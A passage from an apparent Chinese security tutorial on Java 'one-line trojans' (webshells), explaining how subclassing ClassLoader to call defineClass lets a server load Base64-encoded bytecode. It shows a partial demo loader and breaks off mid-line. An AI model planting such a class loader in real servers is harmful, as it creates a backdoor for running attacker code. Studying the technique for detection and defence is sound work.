安全技术系列之Java一句话木马

0x01 原理介绍

首先要让服务端有动态地将字节流解析成Class的能力，这是基础。
正常情况下，Java并没有提供直接解析class字节数组的接口。不过classloader内部实现了一个protected的defineClass方法，可以将byte[]直接转换为Class，方法原型如下：

因为该方法是protected的，我们没办法在外部直接调用，当然我们可以通过反射来修改保护属性，不过我们选择一个更方便的方法，直接自定义一个类继承classloader，然后在子类中调用父类的defineClass方法。

下面是一个简单的Demo：

public class Demo {
   
    
    public static class Myloader extends ClassLoader {
   
        public Class get(byte[] b) {
   
            return super.defineClass(b, 0, b.length);
        }
    }

    // 使用继承ClassLoader的方法
    public static Class<?> getClass(String classCode) throws IOException, InstantiationException, IllegalAccessException {
   
        BASE64Decoder code = new BASE64Decoder();
        Class result = new Myloader().get(code.